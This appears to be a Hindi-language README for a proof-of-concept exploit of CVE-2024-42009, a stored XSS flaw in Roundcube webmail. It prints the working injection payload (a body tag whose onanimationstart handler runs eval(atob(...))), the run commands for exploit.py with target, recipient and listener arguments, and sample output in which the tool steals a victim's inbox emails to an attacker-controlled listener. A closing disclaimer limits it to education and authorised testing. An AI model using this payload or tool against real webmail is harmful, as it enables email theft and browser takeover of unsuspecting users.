
CVE-2024-42009 अवधारणा का प्रमाण
इस रिपॉज़िटरी में CVE-2024-42009 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट (PoC) एक्सप्लॉइट है, जो Roundcube वेबमेल संस्करण 1.6.7 और अन्य कई संस्करणों में एक संग्रहीत क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता है। यह एक्सप्लॉइट दर्शाता है कि कैसे एक हमलावर किसी संदेश में दुर्भावनापूर्ण JavaScript इंजेक्ट कर सकता है और संदेश के अंदर HTML पार्स करते समय डिसैनिटाइज़ेशन समस्या का फायदा उठा सकता है, जिसका उपयोग इस उदाहरण में पीड़ित के इनबॉक्स से ईमेल सामग्री निकालने या पीड़ित के ब्राउज़र को भी अपने कब्जे में लेने के लिए किया जा सकता है।
Roundcube 1.5.7 तक और 1.6.x से 1.6.7 तक के संस्करणों में एक क्रॉस-साइट स्क्रिप्टिंग भेद्यता एक दूरस्थ हमलावर को program/actions/mail/show.php में message_body() में डिसैनिटाइज़ेशन समस्या का दुरुपयोग करने वाले गढ़े गए ईमेल संदेश के माध्यम से पीड़ित के ईमेल चुराने और भेजने की अनुमति देती है।
एक्सप्लॉइट XSS निष्पादन के लिए CSS एनीमेशन ट्रिगर का उपयोग करता है:
<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=eval(atob('BASE64_PAYLOAD')) foo=bar>
बॉडी को एक div के रूप में पार्स किया जाता है, और फिर हमें उसके अनुकूल होने की आवश्यकता होती है, इसीलिए हम eval फ़ंक्शन को कॉल करने और उससे जटिल JavaScript कॉल्स निष्पादित करने के लिए onanimationstart विशेषता का उपयोग करते हैं। यह समझने के लिए कि एक्सप्लॉइट कैसे काम करता है और Roundcube में भेद्यताएँ कहाँ हैं, यह लेख पढ़ें।
आवश्यक Python पैकेज इंस्टॉल करें:
python3 -m venv venv
python3 -m pip install -r requirements
python3 exploit.py -u <TARGET_URL> -r <RECIPIENT_EMAIL> -l <LISTENER_HOST> -p <LISTENER_PORT>
http://email.company.local/contact)python3 exploit.py -u http://webmail.target.com/contact -r [email protected] -l 192.168.1.100 -p 4444
[*] Crafting payload for http://webmail.target.com/contact with recipient [email protected]
[*] Sending payload to http://webmail.target.com/contact with recipient [email protected]
[*] Starting HTTP server on port 4444
[+] HTTP server listening on port 4444
[*] Waiting for emails... (Press Ctrl+C to stop manually)
[+] Received 3 emails!
------------------------------------------------------------
📧 EMAIL UID: 1
------------------------------------------------------------
From: [email protected]
Subject: Quarterly Report
Message:
Please find attached the quarterly financial report...
------------------------------------------------------------
[+] Email exfiltration complete! Shutting down server...
[+] Server stopped successfully!
⚠️ महत्वपूर्ण: यह प्रूफ-ऑफ-कॉन्सेप्ट केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए प्रदान किया गया है। इसका उपयोग जिम्मेदारी से करें और यह अकाउंट दूसरों द्वारा किए गए किसी भी नुकसान के लिए ज़िम्मेदार नहीं है।